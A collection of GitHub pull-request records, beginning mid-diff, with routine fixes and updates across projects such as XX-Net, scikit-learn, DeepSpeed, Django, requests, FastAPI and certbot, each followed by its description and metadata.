+ command -v $1 > /dev/null
+}
+
# Install Packages
if [ $os_name = 'Linux' ]; then
- echo 'Install python-openssl and libnss3-tools for your system'
- if [ `which apt-get | wc -l` != 0 ]; then
- if [ `dpkg-query -l | grep python-openssl | wc -l` == 0 ]; then
- sudo apt-get install -y python-openssl
- fi
- elif [ `which dnf | wc -l` != 0 ]; then
- if [ `dnf -q list installed | grep pyOpenSSL | wc -l` == 0 ]; then
- sudo dnf install -y pyOpenSSL
- fi
- elif [ `which yum | wc -l` != 0 ]; then
- if [ `yum -q list installed | grep pyOpenSSL | wc -l` == 0 ]; then
- sudo yum install -y pyOpenSSL
- fi
- elif [ `which pacman | wc -l` != 0 ]; then
- if [ `pacman -Q | grep python2-pyopenssl | wc -l` == 0 ]; then
- sudo pacman -S --noconfirm openssl python2-pyopenssl
+ if ! python -c 'import OpenSSL' 2> /dev/null; then
+ echo 'You have not installed pyOpenSSL yet.'
+ if [[ $- == *i* ]]; then
+ # interactive shell
+ echo 'Installing pyOpenSSL for your system... Please type in your password if requested'
+ if has_command zypper; then
+ # openSUSE
+ sudo zypper in -y python-pyOpenSSL
+ elif has_command apt-get; then
+ # Debian or Debian-like
+ sudo apt-get install -y python-openssl
+ elif has_command dnf; then
+ # Fedora
+ sudo dnf install -y pyOpenSSL
+ elif has_command yum; then
+ # RedHat
+ sudo yum install -y pyOpenSSL
+ elif has_command pacman; then
+ # ArchLinux
+ sudo pacman -S --noconfirm openssl python2-pyopenssl
+ # Do Someting for OpenWRT
+ fi
+ else
+ # non-interactive shell
+ echo 1>&2 'Please install pyOpenSSL.'
+ exit 1
fi
- # Do Someting for OpenSUSE
- # Do Someting for OpenWRT
fi
elif [ $os_name = 'Darwin' ]; then
if [ `python -c 'import OpenSSL; print(OpenSSL.SSL.OPENSSL_VERSION_NUMBER > 0x1000200)' 2> /dev/null | grep True | wc -l` != 1 ]; then
|
Add script for openSUSE
Only auto-install in an interactive shell.
The openSUSE check was moved to the front because openSUSE ships apt-get and aptitude as two Perl scripts that translate and partially support deb-style commands, so checking for apt-get first could cause problems (although after I changed how the pyOpenSSL installation is detected, the order no longer seems to matter).
|
https://api.github.com/repos/XX-net/XX-Net/pulls/3216
|
2016-05-04T16:36:06Z
|
2016-05-05T03:22:44Z
|
2016-05-05T03:22:44Z
|
2019-05-01T01:44:23Z
| 729
|
XX-net/XX-Net
| 17,260
|
Adding AWS SysOps Associate certification learning resources
|
diff --git a/certificates/aws-cloud-sysops-associate.md b/certificates/aws-cloud-sysops-associate.md
new file mode 100644
index 000000000..38fa3bd43
--- /dev/null
+++ b/certificates/aws-cloud-sysops-associate.md
@@ -0,0 +1,34 @@
+## AWS Cloud SysOps Administration Associate
+
+A summary of what you need to know for the exam can be found [here](https://aws.amazon.com/certification/certified-sysops-admin-associate)
+
+### <b> Who should take this exam? </b>
+<br>
+AWS Certified SysOps Administrator - Associate is intended for system administrators in cloud operations roles to validate technical skills.
+
+<summary>Before you take this exam, we recommend you have :</summary><br><b>
+
+ * A minimum of one year of hands-on experience with AWS technology
+ * Experience deploying, managing, and operating workloads on AWS as well as implementing security controls and compliance requirements
+ * Familiarity with using both the AWS Management Console and the AWS Command Line Interface (CLI)
+ * Understanding of the AWS Well-Architected Framework as well as AWS networking and security services
+</b>
+
+### <b> Prepare for your exam </b>
+<br>
+Get started with free resources or explore additional resources, including Official Practice Exams, with a subscription to AWS Skill Builder.
+
+ * AWS Cloud SysOps Guide (SOA-C02) [here](https://d1.awsstatic.com/training-and-certification/docs-sysops-associate/AWS-Certified-SysOps-Administrator-Associate_Exam-Guide.pdf)
+ * AWS Certified SysOps Administrator - Associate Official Practice Question Set (FREE) [here](https://explore.skillbuilder.aws/learn/course/external/view/elearning/12485/aws-certified-sysops-administrator-associate-practice-question-set-soa-c02-english?syops=sec&sec=prep)
+ * Exam Prep: AWS Certified SysOps Administrator - Associate (FREE) [here](https://explore.skillbuilder.aws/learn/course/external/view/elearning/9313/exam-prep-aws-certified-sysops-administrator-associate)
+
+ ### <b> Certification resource </b>
+ <br>
+ This is a resource for studying and preparing for the AWS Cloud SysOps Associate exam.
+
+ * Architecting for the cloud [here](https://d1.awsstatic.com/whitepapers/AWS_Cloud_Best_Practices.pdf)
+ * AWS Well-Architected Framework [here](https://d0.awsstatic.com/whitepapers/architecture/AWS_Well-Architected_Framework.pdf)
+ * Development and Test on Amazon Web Services [here](https://media.amazonwebservices.com/AWS_Development_Test_Environments.pdf)
+ * Backup, Archive, and Restore Approaches Using AWS [here](https://d0.awsstatic.com/whitepapers/Backup_Archive_and_Restore_Approaches_Using_AWS.pdf)
+ * How AWS Pricing Works - AWS Pricing Overview [here](https://d0.awsstatic.com/whitepapers/aws_pricing_overview.pdf)
+ * Sample Question AWS SOA-C02 [here](https://d1.awsstatic.com/training-and-certification/docs-sysops-associate/AWS-Certified-SysOps-Administrator-Associate_Sample-Questions.pdf)
\ No newline at end of file
|
Hello sir, I have added the AWS SysOps Associate certification study resource
|
https://api.github.com/repos/bregman-arie/devops-exercises/pulls/301
|
2022-10-11T16:55:26Z
|
2022-10-11T19:57:41Z
|
2022-10-11T19:57:41Z
|
2022-10-12T21:27:18Z
| 746
|
bregman-arie/devops-exercises
| 17,429
|
Fix nonsensical date in changelog
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 29590c34b..58a018454 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,7 +5,7 @@ All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
-## [13.5.1] - 2023-29-31
+## [13.5.1] - 2023-07-31
### Fixed
|
Clearly a typo
|
https://api.github.com/repos/Textualize/rich/pulls/3071
|
2023-07-31T10:26:37Z
|
2023-07-31T10:48:36Z
|
2023-07-31T10:48:36Z
|
2023-07-31T10:51:00Z
| 159
|
Textualize/rich
| 48,134
|
MAINT Try to fix [icc-build] in travis (+doc)
|
diff --git a/build_tools/travis/install.sh b/build_tools/travis/install.sh
index 84ceb8c4f6312..09f42e1aae96f 100755
--- a/build_tools/travis/install.sh
+++ b/build_tools/travis/install.sh
@@ -89,7 +89,7 @@ if [[ "$BUILD_WITH_ICC" == "true" ]]; then
sudo add-apt-repository "deb https://apt.repos.intel.com/oneapi all main"
sudo apt-get update
sudo apt-get install intel-oneapi-icc
- source /opt/intel/inteloneapi/setvars.sh
+ source /opt/intel/oneapi/setvars.sh
# The build_clib command is implicitly used to build libsvm-skl. To compile
# with a different compiler we also need to specify the compiler for this
diff --git a/build_tools/travis/test_docs.sh b/build_tools/travis/test_docs.sh
index 7246165a43767..08f08a7300bb9 100755
--- a/build_tools/travis/test_docs.sh
+++ b/build_tools/travis/test_docs.sh
@@ -3,12 +3,6 @@
set -e
set -x
-if [[ "$BUILD_WITH_ICC" == "true" ]]; then
- # the tools in the oneAPI toolkits are configured via environment variables
- # which are also required at runtime.
- source /opt/intel/inteloneapi/setvars.sh
-fi
-
if [[ "$TRAVIS_CPU_ARCH" != "arm64" ]]; then
PYTEST="pytest -n $CI_CPU_COUNT" make test-doc
fi
diff --git a/build_tools/travis/test_script.sh b/build_tools/travis/test_script.sh
index f9a3fd4774c36..fff4cc12c86d2 100755
--- a/build_tools/travis/test_script.sh
+++ b/build_tools/travis/test_script.sh
@@ -21,12 +21,6 @@ except ImportError:
python -c "import joblib; print(joblib.cpu_count(), 'CPUs')"
python -c "import platform; print(platform.machine())"
-if [[ "$BUILD_WITH_ICC" == "true" ]]; then
- # the tools in the oneAPI toolkits are configured via environment variables
- # which are also required at runtime.
- source /opt/intel/inteloneapi/setvars.sh
-fi
-
run_tests() {
TEST_CMD="pytest --showlocals --durations=20 --pyargs"
diff --git a/doc/developers/advanced_installation.rst b/doc/developers/advanced_installation.rst
index 6e682fec8c0dc..91b44cbafb348 100644
--- a/doc/developers/advanced_installation.rst
+++ b/doc/developers/advanced_installation.rst
@@ -434,7 +434,7 @@ Install ICC, packaged under the name ``intel-oneapi-icc``::
Before using ICC, you need to set up environment variables::
- source /opt/intel/inteloneapi/setvars.sh
+ source /opt/intel/oneapi/setvars.sh
Finally, you can build scikit-learn. For example on Linux x86_64::
|
It seems that Intel has renamed a file, which made the Travis cron job fail as a result.
|
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/18730
|
2020-11-02T11:27:10Z
|
2020-11-02T15:37:34Z
|
2020-11-02T15:37:34Z
|
2020-11-02T15:37:40Z
| 710
|
scikit-learn/scikit-learn
| 45,928
|
Fix rnn flop profiler to compute flops instead of macs
|
diff --git a/deepspeed/profiling/flops_profiler/profiler.py b/deepspeed/profiling/flops_profiler/profiler.py
index 29d74c617ac9..38ab92ed8284 100644
--- a/deepspeed/profiling/flops_profiler/profiler.py
+++ b/deepspeed/profiling/flops_profiler/profiler.py
@@ -960,10 +960,11 @@ def _reload_tensor_methods():
def _rnn_flops(flops, rnn_module, w_ih, w_hh, input_size):
+ input_size, hidden_size = w_ih.shape
# matrix matrix mult ih state and internal state
- flops += w_ih.shape[0] * w_ih.shape[1]
+ flops += 2 * input_size * hidden_size - hidden_size
# matrix matrix mult hh state and internal state
- flops += w_hh.shape[0] * w_hh.shape[1]
+ flops += 2 * hidden_size * hidden_size - hidden_size
if isinstance(rnn_module, (nn.RNN, nn.RNNCell)):
# add both operations
flops += rnn_module.hidden_size
|
This MR is related to the issue I recently opened: https://github.com/microsoft/DeepSpeed/issues/3816
It implements the fix I proposed there, which simply computes FLOPs instead of MACs.
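To make the difference concrete, a small worked example using the formula from the patch (the sizes are arbitrary):
```python
# FLOPs vs MACs for one input-to-hidden matmul, per the patched formula.
input_size, hidden_size = 128, 256

macs  = input_size * hidden_size                    # old count: one MAC per weight
flops = 2 * input_size * hidden_size - hidden_size  # new count: multiplies plus adds

print(macs, flops)  # 32768 65280
```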
|
https://api.github.com/repos/microsoft/DeepSpeed/pulls/3833
|
2023-06-28T08:49:11Z
|
2023-07-06T15:57:46Z
|
2023-07-06T15:57:46Z
|
2023-07-06T15:57:46Z
| 266
|
microsoft/DeepSpeed
| 10,326
|
Fixed #28472 -- Optimized jQuery selector in actions.js
|
diff --git a/django/contrib/admin/static/admin/js/actions.js b/django/contrib/admin/static/admin/js/actions.js
index 7041701f271bf..0f435abcc307c 100644
--- a/django/contrib/admin/static/admin/js/actions.js
+++ b/django/contrib/admin/static/admin/js/actions.js
@@ -109,7 +109,7 @@
lastChecked = target;
updateCounter();
});
- $('form#changelist-form table#result_list tr').find('td:gt(0) :input').change(function() {
+ $('form#changelist-form table#result_list tr').on('change', 'td:gt(0) :input', function() {
list_editable_changed = true;
});
$('form#changelist-form button[name="index"]').click(function(event) {
diff --git a/django/contrib/admin/static/admin/js/actions.min.js b/django/contrib/admin/static/admin/js/actions.min.js
index a07b1fc07eae8..1b771fb608f2e 100644
--- a/django/contrib/admin/static/admin/js/actions.min.js
+++ b/django/contrib/admin/static/admin/js/actions.min.js
@@ -1,9 +1,6 @@
-var $jscomp={scope:{},findInternal:function(a,d,c){a instanceof String&&(a=String(a));for(var b=a.length,e=0;e<b;e++){var h=a[e];if(d.call(c,h,e,a))return{i:e,v:h}}return{i:-1,v:void 0}}};$jscomp.defineProperty="function"==typeof Object.defineProperties?Object.defineProperty:function(a,d,c){if(c.get||c.set)throw new TypeError("ES3 does not support getters and setters.");a!=Array.prototype&&a!=Object.prototype&&(a[d]=c.value)};
-$jscomp.getGlobal=function(a){return"undefined"!=typeof window&&window===a?a:"undefined"!=typeof global&&null!=global?global:a};$jscomp.global=$jscomp.getGlobal(this);$jscomp.polyfill=function(a,d,c,b){if(d){c=$jscomp.global;a=a.split(".");for(b=0;b<a.length-1;b++){var e=a[b];e in c||(c[e]={});c=c[e]}a=a[a.length-1];b=c[a];d=d(b);d!=b&&null!=d&&$jscomp.defineProperty(c,a,{configurable:!0,writable:!0,value:d})}};
-$jscomp.polyfill("Array.prototype.find",function(a){return a?a:function(a,c){return $jscomp.findInternal(this,a,c).v}},"es6-impl","es3");
-(function(a){var d;a.fn.actions=function(c){var b=a.extend({},a.fn.actions.defaults,c),e=a(this),h=!1,l=function(){a(b.acrossClears).hide();a(b.acrossQuestions).show();a(b.allContainer).hide()},m=function(){a(b.acrossClears).show();a(b.acrossQuestions).hide();a(b.actionContainer).toggleClass(b.selectedClass);a(b.allContainer).show();a(b.counterContainer).hide()},n=function(){a(b.acrossClears).hide();a(b.acrossQuestions).hide();a(b.allContainer).hide();a(b.counterContainer).show()},p=function(){n();
-a(b.acrossInput).val(0);a(b.actionContainer).removeClass(b.selectedClass)},q=function(f){f?l():n();a(e).prop("checked",f).parent().parent().toggleClass(b.selectedClass,f)},k=function(){var f=a(e).filter(":checked").length,c=a(".action-counter").data("actionsIcnt");a(b.counterContainer).html(interpolate(ngettext("%(sel)s of %(cnt)s selected","%(sel)s of %(cnt)s selected",f),{sel:f,cnt:c},!0));a(b.allToggle).prop("checked",function(){var a;f===e.length?(a=!0,l()):(a=!1,p());return a})};a(b.counterContainer).show();
-a(this).filter(":checked").each(function(c){a(this).parent().parent().toggleClass(b.selectedClass);k();1===a(b.acrossInput).val()&&m()});a(b.allToggle).show().click(function(){q(a(this).prop("checked"));k()});a("a",b.acrossQuestions).click(function(c){c.preventDefault();a(b.acrossInput).val(1);m()});a("a",b.acrossClears).click(function(c){c.preventDefault();a(b.allToggle).prop("checked",!1);p();q(0);k()});d=null;a(e).click(function(c){c||(c=window.event);var g=c.target?c.target:c.srcElement;if(d&&
-a.data(d)!==a.data(g)&&!0===c.shiftKey){var f=!1;a(d).prop("checked",g.checked).parent().parent().toggleClass(b.selectedClass,g.checked);a(e).each(function(){if(a.data(this)===a.data(d)||a.data(this)===a.data(g))f=f?!1:!0;f&&a(this).prop("checked",g.checked).parent().parent().toggleClass(b.selectedClass,g.checked)})}a(g).parent().parent().toggleClass(b.selectedClass,g.checked);d=g;k()});a("form#changelist-form table#result_list tr").find("td:gt(0) :input").change(function(){h=!0});a('form#changelist-form button[name="index"]').click(function(a){if(h)return confirm(gettext("You have unsaved changes on individual editable fields. If you run an action, your unsaved changes will be lost."))});
-a('form#changelist-form input[name="_save"]').click(function(c){var d=!1;a("select option:selected",b.actionContainer).each(function(){a(this).val()&&(d=!0)});if(d)return h?confirm(gettext("You have selected an action, but you haven't saved your changes to individual fields yet. Please click OK to save. You'll need to re-run the action.")):confirm(gettext("You have selected an action, and you haven't made any changes on individual fields. You're probably looking for the Go button rather than the Save button."))})};
-a.fn.actions.defaults={actionContainer:"div.actions",counterContainer:"span.action-counter",allContainer:"div.actions span.all",acrossInput:"div.actions input.select-across",acrossQuestions:"div.actions span.question",acrossClears:"div.actions span.clear",allToggle:"#action-toggle",selectedClass:"selected"};a(document).ready(function(){var c=a("tr input.action-select");0<c.length&&c.actions()})})(django.jQuery);
+(function(a){var f;a.fn.actions=function(e){var b=a.extend({},a.fn.actions.defaults,e),g=a(this),k=!1,l=function(){a(b.acrossClears).hide();a(b.acrossQuestions).show();a(b.allContainer).hide()},m=function(){a(b.acrossClears).show();a(b.acrossQuestions).hide();a(b.actionContainer).toggleClass(b.selectedClass);a(b.allContainer).show();a(b.counterContainer).hide()},n=function(){a(b.acrossClears).hide();a(b.acrossQuestions).hide();a(b.allContainer).hide();a(b.counterContainer).show()},p=function(){n();
+a(b.acrossInput).val(0);a(b.actionContainer).removeClass(b.selectedClass)},q=function(c){c?l():n();a(g).prop("checked",c).parent().parent().toggleClass(b.selectedClass,c)},h=function(){var c=a(g).filter(":checked").length,d=a(".action-counter").data("actionsIcnt");a(b.counterContainer).html(interpolate(ngettext("%(sel)s of %(cnt)s selected","%(sel)s of %(cnt)s selected",c),{sel:c,cnt:d},!0));a(b.allToggle).prop("checked",function(){var a;c===g.length?(a=!0,l()):(a=!1,p());return a})};a(b.counterContainer).show();
+a(this).filter(":checked").each(function(c){a(this).parent().parent().toggleClass(b.selectedClass);h();1===a(b.acrossInput).val()&&m()});a(b.allToggle).show().click(function(){q(a(this).prop("checked"));h()});a("a",b.acrossQuestions).click(function(c){c.preventDefault();a(b.acrossInput).val(1);m()});a("a",b.acrossClears).click(function(c){c.preventDefault();a(b.allToggle).prop("checked",!1);p();q(0);h()});f=null;a(g).click(function(c){c||(c=window.event);var d=c.target?c.target:c.srcElement;if(f&&
+a.data(f)!==a.data(d)&&!0===c.shiftKey){var e=!1;a(f).prop("checked",d.checked).parent().parent().toggleClass(b.selectedClass,d.checked);a(g).each(function(){if(a.data(this)===a.data(f)||a.data(this)===a.data(d))e=e?!1:!0;e&&a(this).prop("checked",d.checked).parent().parent().toggleClass(b.selectedClass,d.checked)})}a(d).parent().parent().toggleClass(b.selectedClass,d.checked);f=d;h()});a("form#changelist-form table#result_list tr").on("change","td:gt(0) :input",function(){k=!0});a('form#changelist-form button[name="index"]').click(function(a){if(k)return confirm(gettext("You have unsaved changes on individual editable fields. If you run an action, your unsaved changes will be lost."))});
+a('form#changelist-form input[name="_save"]').click(function(c){var d=!1;a("select option:selected",b.actionContainer).each(function(){a(this).val()&&(d=!0)});if(d)return k?confirm(gettext("You have selected an action, but you haven't saved your changes to individual fields yet. Please click OK to save. You'll need to re-run the action.")):confirm(gettext("You have selected an action, and you haven't made any changes on individual fields. You're probably looking for the Go button rather than the Save button."))})};
+a.fn.actions.defaults={actionContainer:"div.actions",counterContainer:"span.action-counter",allContainer:"div.actions span.all",acrossInput:"div.actions input.select-across",acrossQuestions:"div.actions span.question",acrossClears:"div.actions span.clear",allToggle:"#action-toggle",selectedClass:"selected"};a(document).ready(function(){var e=a("tr input.action-select");0<e.length&&e.actions()})})(django.jQuery);
|
Refactored a jQuery selector to use a single delegated handler for the
'change' event. This speeds up page loading time.
|
https://api.github.com/repos/django/django/pulls/8861
|
2017-08-07T14:53:34Z
|
2017-08-08T12:35:58Z
|
2017-08-08T12:35:58Z
|
2017-08-08T12:58:18Z
| 2,324
|
django/django
| 51,085
|
Remove snap-plugin reference from README
|
diff --git a/snap/local/README.md b/snap/local/README.md
index ea509b22975..62977f8c3ce 100644
--- a/snap/local/README.md
+++ b/snap/local/README.md
@@ -66,7 +66,7 @@ These steps need to be done once to set up your VM and do not need to be run aga
5. Add your current user to the lxd group and update your shell to have the new assignment by running `sudo usermod -a -G lxd ${USER} && newgrp lxd`.
6. Install snapcraft with `sudo snap install --classic snapcraft`.
7. `cd ~` (or any other directory where you want our source files to be)
- 8. Run `git clone git://github.com/certbot/certbot -b snap-plugin`
+ 8. Run `git clone git://github.com/certbot/certbot`
9. `cd certbot`
### Build the Snaps
|
The `snap-plugin` branch doesn't exist anymore.
|
https://api.github.com/repos/certbot/certbot/pulls/8101
|
2020-06-22T22:30:49Z
|
2020-06-22T22:49:19Z
|
2020-06-22T22:49:19Z
|
2020-06-22T22:49:26Z
| 227
|
certbot/certbot
| 1,411
|
3780: Lazy load idna library
|
diff --git a/AUTHORS.rst b/AUTHORS.rst
index c05befce32..cc9e75f3bd 100644
--- a/AUTHORS.rst
+++ b/AUTHORS.rst
@@ -175,3 +175,4 @@ Patches and Suggestions
- Hussain Tamboli <[email protected]> (`@hussaintamboli <https://github.com/hussaintamboli>`_)
- Casey Davidson (`@davidsoncasey <https://github.com/davidsoncasey>`_)
- Andrii Soldatenko (`@a_soldatenko <https://github.com/andriisoldatenko>`_)
+- Moinuddin Quadri <[email protected]> (`@moin18 <https://github.com/moin18>`_)
diff --git a/requests/models.py b/requests/models.py
index 91555b58f8..d1a9c8687d 100644
--- a/requests/models.py
+++ b/requests/models.py
@@ -9,6 +9,7 @@
import collections
import datetime
+import sys
# Import encoding now, to avoid implicit import later.
# Implicit import within threads may cause LookupError when standard library is in a ZIP,
@@ -21,7 +22,6 @@
from .auth import HTTPBasicAuth
from .cookies import cookiejar_from_dict, get_cookie_header, _copy_cookie_jar
-from .packages import idna
from .packages.urllib3.fields import RequestField
from .packages.urllib3.filepost import encode_multipart_formdata
from .packages.urllib3.util import parse_url
@@ -331,6 +331,22 @@ def prepare_method(self, method):
if self.method is not None:
self.method = to_native_string(self.method.upper())
+ @staticmethod
+ def _get_idna_encoded_host(host):
+ try:
+ from .packages import idna
+ except ImportError:
+ # tolerate the possibility of downstream repackagers unvendoring `requests`
+ # For more information, read: packages/__init__.py
+ import idna
+ sys.modules['requests.packages.idna'] = idna
+
+ try:
+ host = idna.encode(host, uts46=True).decode('utf-8')
+ except idna.IDNAError:
+ raise UnicodeError
+ return host
+
def prepare_url(self, url, params):
"""Prepares the given HTTP URL."""
#: Accept objects that have string representations.
@@ -368,17 +384,17 @@ def prepare_url(self, url, params):
if not host:
raise InvalidURL("Invalid URL %r: No host supplied" % url)
- # In general, we want to try IDNA encoding every hostname, as that
- # allows users to automatically get the correct behaviour. However,
- # we’re quite strict about IDNA encoding, so certain valid hostnames
- # may fail to encode. On failure, we verify the hostname meets a
- # minimum standard of only containing ASCII characters, and not starting
- # with a wildcard (*), before allowing the unencoded hostname through.
- try:
- host = idna.encode(host, uts46=True).decode('utf-8')
- except (UnicodeError, idna.IDNAError):
- if not unicode_is_ascii(host) or host.startswith(u'*'):
+ # In general, we want to try IDNA encoding the hostname if the string contains
+ # non-ASCII characters. This allows users to automatically get the correct IDNA
+ # behaviour. For strings containing only ASCII characters, we need to also verify
+ # it doesn't start with a wildcard (*), before allowing the unencoded hostname.
+ if not unicode_is_ascii(host):
+ try:
+ host = self._get_idna_encoded_host(host)
+ except UnicodeError:
raise InvalidURL('URL has an invalid label.')
+ elif host.startswith(u'*'):
+ raise InvalidURL('URL has an invalid label.')
# Carefully reconstruct the network location
netloc = auth or ''
diff --git a/requests/packages/__init__.py b/requests/packages/__init__.py
index 4077265e97..971c2ad024 100644
--- a/requests/packages/__init__.py
+++ b/requests/packages/__init__.py
@@ -34,9 +34,3 @@
except ImportError:
import chardet
sys.modules['%s.chardet' % __name__] = chardet
-
-try:
- from . import idna
-except ImportError:
- import idna
- sys.modules['%s.idna' % __name__] = idna
|
Changes based on comment from previous Pull Request: https://github.com/kennethreitz/requests/pull/3787
Fix for issue: https://github.com/kennethreitz/requests/issues/3780
|
https://api.github.com/repos/psf/requests/pulls/3789
|
2016-12-23T17:21:43Z
|
2017-01-19T09:19:00Z
|
2017-01-19T09:19:00Z
|
2021-09-07T00:06:42Z
| 1,045
|
psf/requests
| 32,761
|
⬆️ Upgrade MkDocs and MkDocs Material
|
diff --git a/requirements-docs.txt b/requirements-docs.txt
index e9d0567ed76f4..211212fba986c 100644
--- a/requirements-docs.txt
+++ b/requirements-docs.txt
@@ -1,6 +1,6 @@
-e .
-mkdocs >=1.1.2,<2.0.0
-mkdocs-material >=8.1.4,<9.0.0
+mkdocs==1.4.3
+mkdocs-material==9.1.16
mdx-include >=1.4.1,<2.0.0
mkdocs-markdownextradata-plugin >=0.1.7,<0.3.0
typer-cli >=0.0.13,<0.0.14
|
⬆️ Upgrade MkDocs and MkDocs Material
|
https://api.github.com/repos/tiangolo/fastapi/pulls/9729
|
2023-06-23T17:56:20Z
|
2023-06-23T18:16:42Z
|
2023-06-23T18:16:42Z
|
2023-06-23T18:16:42Z
| 174
|
tiangolo/fastapi
| 23,187
|
Update padding.rst
|
diff --git a/docs/source/padding.rst b/docs/source/padding.rst
index a72dcbf9d..0c0225b37 100644
--- a/docs/source/padding.rst
+++ b/docs/source/padding.rst
@@ -17,7 +17,7 @@ For example, the following displays 2 blank lines above and below the text, and
test = Padding("Hello", (2, 4))
print(test)
-The Padding class can also accept a ``style`` argument which applies a style to the padding and contents, and an ``expand`` switch which can be set to False to prevent the padding from extending to the full with of the terminal. Here's an example which demonstrates both these arguments::
+The Padding class can also accept a ``style`` argument which applies a style to the padding and contents, and an ``expand`` switch which can be set to False to prevent the padding from extending to the full width of the terminal. Here's an example which demonstrates both these arguments::
from rich import print
from rich.padding import Padding
|
Typo
## Type of changes
- [ ] Bug fix
- [ ] New feature
- [X] Documentation / docstrings
- [ ] Tests
- [ ] Other
## Checklist
- [ ] I've run the latest [black](https://github.com/psf/black) with default args on new code.
- [ ] I've updated CHANGELOG.md and CONTRIBUTORS.md where appropriate.
- [ ] I've added tests for new code.
- [X] I accept that @willmcgugan may be pedantic in the code review.
## Description
Fixed a typo
|
https://api.github.com/repos/Textualize/rich/pulls/1189
|
2021-04-25T06:12:02Z
|
2021-04-25T14:05:25Z
|
2021-04-25T14:05:25Z
|
2021-04-25T14:05:31Z
| 231
|
Textualize/rich
| 48,609
|
Bump lycheeverse/lychee-action from 1.6.1 to 1.7.0
|
diff --git a/.github/workflows/links.yml b/.github/workflows/links.yml
index f6403720166..a5413318030 100644
--- a/.github/workflows/links.yml
+++ b/.github/workflows/links.yml
@@ -19,7 +19,7 @@ jobs:
- uses: actions/checkout@v3
- name: Test Markdown and HTML links
- uses: lycheeverse/[email protected]
+ uses: lycheeverse/[email protected]
with:
fail: true
# accept 429(Instagram, 'too many requests'), 999(LinkedIn, 'unknown status code'), Timeout(Twitter)
@@ -29,7 +29,7 @@ jobs:
- name: Test Markdown, HTML, YAML, Python and Notebook links
if: github.event_name == 'workflow_dispatch'
- uses: lycheeverse/[email protected]
+ uses: lycheeverse/[email protected]
with:
fail: true
# accept 429(Instagram, 'too many requests'), 999(LinkedIn, 'unknown status code'), Timeout(Twitter)
|
Bumps [lycheeverse/lychee-action](https://github.com/lycheeverse/lychee-action) from 1.6.1 to 1.7.0.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a href="https://github.com/lycheeverse/lychee-action/releases">lycheeverse/lychee-action's releases</a>.</em></p>
<blockquote>
<h2>Version 1.7.0</h2>
<h2>What's Changed</h2>
<ul>
<li>Fix three typos in README by <a href="https://github.com/phieri"><code>@phieri</code></a> in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/184">lycheeverse/lychee-action#184</a></li>
<li>CI: Automatic vX tag update workflow by <a href="https://github.com/tooomm"><code>@tooomm</code></a> in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/185">lycheeverse/lychee-action#185</a></li>
<li>Format arguments in CI pipeline by <a href="https://github.com/mre"><code>@mre</code></a> in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/186">lycheeverse/lychee-action#186</a></li>
<li>Test lychee cache by <a href="https://github.com/mre"><code>@mre</code></a> in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/187">lycheeverse/lychee-action#187</a></li>
<li>Cleanup tar archive; make installation more robst by <a href="https://github.com/mre"><code>@mre</code></a> in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/189">lycheeverse/lychee-action#189</a></li>
<li>Readme: Add info about split up cache steps by <a href="https://github.com/tooomm"><code>@tooomm</code></a> in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/190">lycheeverse/lychee-action#190</a></li>
<li>bump lychee version by <a href="https://github.com/mre"><code>@mre</code></a> in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/192">lycheeverse/lychee-action#192</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a href="https://github.com/phieri"><code>@phieri</code></a> made their first contribution in <a href="https://redirect.github.com/lycheeverse/lychee-action/pull/184">lycheeverse/lychee-action#184</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a href="https://github.com/lycheeverse/lychee-action/compare/v1.6.1...v1.7.0">https://github.com/lycheeverse/lychee-action/compare/v1.6.1...v1.7.0</a></p>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/97189f2c0a3c8b0cb0e704fd4e878af6e5e2b2c5"><code>97189f2</code></a> bump version</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/01d72a032635cc56bf23e901b9d5fb3272419ca1"><code>01d72a0</code></a> update to 1.7.0</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/7dedc2e65d226a92c5037f28f9587ac990e43803"><code>7dedc2e</code></a> bump lychee version (<a href="https://redirect.github.com/lycheeverse/lychee-action/issues/192">#192</a>)</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/a12cbb3a4921899299dcc58a6136bcdd0d1fbf1c"><code>a12cbb3</code></a> add info about split up cache steps (<a href="https://redirect.github.com/lycheeverse/lychee-action/issues/190">#190</a>)</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/053a19c5553b4658ddaf67cb19fc9634f178a430"><code>053a19c</code></a> Update FUNDING.yml</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/249abafe5e45bd0bd7b16d9f57791044a22881eb"><code>249abaf</code></a> Cleanup tar archive; make installation more robst (<a href="https://redirect.github.com/lycheeverse/lychee-action/issues/189">#189</a>)</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/8aac478accffb57894c1d3ac2ffdaeb54c1fd5b5"><code>8aac478</code></a> Test lychee cache (<a href="https://redirect.github.com/lycheeverse/lychee-action/issues/187">#187</a>)</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/a4ca7a733dd317f546cad0b3b9a56a6ce728e921"><code>a4ca7a7</code></a> Format arguments (<a href="https://redirect.github.com/lycheeverse/lychee-action/issues/186">#186</a>)</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/ec141401078393f1f68edbcef205b6db1501fe48"><code>ec14140</code></a> CI: Automatic vX tag update workflow (<a href="https://redirect.github.com/lycheeverse/lychee-action/issues/185">#185</a>)</li>
<li><a href="https://github.com/lycheeverse/lychee-action/commit/c90955041c1be4e02158e386ba2b8d9c376160ee"><code>c909550</code></a> Fix three typos in README (<a href="https://redirect.github.com/lycheeverse/lychee-action/issues/184">#184</a>)</li>
<li>See full diff in <a href="https://github.com/lycheeverse/lychee-action/compare/v1.6.1...v1.7.0">compare view</a></li>
</ul>
</details>
